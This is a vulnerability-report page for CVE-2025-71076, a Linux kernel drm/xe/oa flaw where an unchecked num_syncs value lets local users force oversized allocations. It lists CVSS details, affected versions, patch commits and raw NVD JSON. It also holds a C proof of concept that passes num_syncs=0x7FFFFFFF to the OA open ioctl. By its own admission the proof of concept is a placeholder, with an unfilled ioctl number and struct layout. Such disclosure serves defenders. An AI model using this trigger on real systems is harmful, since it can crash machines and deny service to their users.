Security Vulnerability Report
CVE-2025-71076 CVSS 5.5 MEDIUM

CVE-2025-71076

Published: 2026-01-13 16:16:07
Last Modified: 2026-03-25 19:00:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/xe/oa: Limit num_syncs to prevent oversized allocations

The OA open parameters did not validate num_syncs, allowing userspace to pass arbitrarily large values, potentially leading to excessive allocations.

Add check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS, returning -EINVAL when the limit is violated.

v2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)

(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.12.17, before 6.12.64)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.13.1, before 6.18.3)
cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:* - VULNERABLE
Linux kernel drm/xe/oa: mainline is vulnerable before commit e057b2d2b8d815df3858a87dffafa2af37e5945b; the stable fixes are commits 338849090ee6, b963636331fb and f8dd66bfb4e1 on git.kernel.org (listed as Patch references in the NVD record).
Affected stable series, from the version ranges in the NVD record: 6.12.y from 6.12.17 (fixed in 6.12.64) and 6.13 through 6.18.y (fixed in 6.18.3), plus 6.19-rc1 through 6.19-rc8. The record lists no 5.4.x, 5.10.x or 5.15.x versions, and the xe driver does not exist in those series.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-71076 PoC - Linux Kernel drm/xe/oa num_syncs Validation Bypass
 *
 * This PoC demonstrates the vulnerability where the unvalidated num_syncs
 * parameter in the OA open ioctl can lead to excessive memory allocation.
 *
 * Note: This is a proof-of-concept for educational purposes only.
 * Running this may cause system instability or crash.
 *
 * Requirements:
 * - Intel Xe graphics hardware (or xe driver module loaded)
 * - Local access to /dev/dri/cardX
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdint.h>

/*
 * Structure definition based on DRM_XE_OA_OPEN ioctl.
 * Placeholder: the page does not supply the real xe request layout or the
 * ioctl number below, so this file does not build until both are filled in.
 */
struct drm_xe_oa_open {
	uint32_t flags;
	uint32_t oa_unit;
	uint32_t num_syncs;	/* Unvalidated parameter - vulnerability */
	uint64_t syncs;		/* Pointer to sync objects */
	uint32_t ctx_id;
	uint32_t reserved0;
	uint64_t reserved1[4];
};

#define DRM_IOCTL_XE_OA_OPEN 0x?? /* Actual ioctl number */

int main(int argc, char *argv[])
{
	int fd;
	struct drm_xe_oa_open args;

	/* Open the DRM device */
	fd = open("/dev/dri/card0", O_RDWR);
	if (fd < 0) {
		perror("Failed to open DRM device");
		return 1;
	}

	/* Initialize args structure */
	memset(&args, 0, sizeof(args));

	/*
	 * VULNERABILITY: Setting num_syncs to an extremely large value.
	 * This should be validated against DRM_XE_MAX_SYNCS but wasn't
	 * before the fix.
	 */
	args.num_syncs = 0x7FFFFFFF;	/* Large value to trigger excessive allocation */
	args.syncs = 0;
	args.oa_unit = 0;
	args.flags = 0;

	printf("CVE-2025-71076 PoC\n");
	printf("Attempting to trigger vulnerability with num_syncs=%u\n", args.num_syncs);

	/* Trigger the vulnerable ioctl */
	if (ioctl(fd, DRM_IOCTL_XE_OA_OPEN, &args) < 0) {
		/* After fix: Should return -EINVAL */
		perror("ioctl failed (expected after patch)");
	} else {
		printf("ioctl succeeded - possible vulnerability present\n");
	}

	close(fd);
	return 0;
}

References

https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab (Patch)
https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb (Patch)
https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71076", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:07.093", "lastModified": "2026-03-25T19:00:30.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndrm/xe/oa: Limitar num_syncs para prevenir asignaciones sobredimensionadas\n\nLos parámetros de apertura de OA no validaban num_syncs, permitiendo que el espacio de usuario pasara valores arbitrariamente grandes, lo que podría llevar a asignaciones excesivas.\n\nAñadir una comprobación para asegurar que num_syncs no exceda DRM_XE_MAX_SYNCS, devolviendo -EINVAL cuando se viola el límite.\n\nv2: usar XE_IOCTL_DBG() y eliminar la comprobación duplicada. 
(Ashutosh)\n\n(extraído del commit e057b2d2b8d815df3858a87dffafa2af37e5945b)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.17", "versionEndExcluding": "6.12.64", "matchCriteriaId": "A76F5157-D861-499C-A193-C0CC4D9E0D9C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}